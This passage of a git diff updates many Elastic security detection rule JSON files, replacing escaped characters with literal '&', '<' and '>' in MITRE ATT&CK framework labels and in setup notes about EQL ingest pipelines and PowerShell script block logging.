--- a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_107.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json
index 8bcbcfc1917..a6bb4198ea7 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b868f1f-15ff-4ba3-8c11-d5a7a6356d37_1.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json
index 37817693b96..dc77c44f164 100644
--- a/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4b95ecea-7225-4690-9938-2a2c0bad9c99_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json
index 691b61fc2f0..a17b9c701b7 100644
--- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_103.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json
index 9704521b5a1..d53a5740cc7 100644
--- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json
index 8afc7fabfa5..3a1e6fe12bf 100644
--- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json
index e7be722a428..f7c313ff641 100644
--- a/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/4bd1c1af-79d4-4d37-9efa-6e0240640242_106.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4bd1c1af-79d4-4d37-9efa-6e0240640242",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json
index 5bae37c459d..41515fc6f18 100644
--- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_5.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json
index bcf9d45cd6b..e0f7abf9a95 100644
--- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_6.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json
index db863a7d94b..f1e47005566 100644
--- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_7.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -78,7 +78,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -105,7 +105,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json
index b56f268cfd1..0174ebf1662 100644
--- a/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/4c59cff1-b78a-41b8-a9f1-4231984d1fb6_8.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -78,7 +78,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -105,7 +105,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json
index daff70b29e2..d6d52fb0764 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_1.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -73,7 +73,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json
index 9bd2c78bcd7..2f10461cd8b 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_2.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -73,7 +73,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json
index 7ee53fc6c8a..b5378844f96 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_3.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -74,7 +74,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -96,7 +96,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json
index 144a1dde6ec..40703932bd3 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_4.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json
index 89e4d6a78f3..417675b2d9e 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_5.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json
index 2b5a26785b3..bb591d9a30a 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_102.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json
index 05ae2fa207d..e7f3a225be5 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_103.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json
index 885ca9159c5..1dd777be87d 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_104.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json
index d2cbccaac03..421b5879791 100644
--- a/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/4d50a94f-2844-43fa-8395-6afbd5e1c5ef_205.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json
index ed17c18db0c..981abe8bb28 100644
--- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_102.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json
index b713f099192..c7687cdcaee 100644
--- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_103.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json
index 76730407b94..24154bfa436 100644
--- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json
index 022976d6b45..b0d0342066b 100644
--- a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_105.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json
index df9c309d52d..cc4b6714705 100644
--- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_105.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 21,
 "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json
index 71f8df6c13c..a95b52ba942 100644
--- a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_106.json
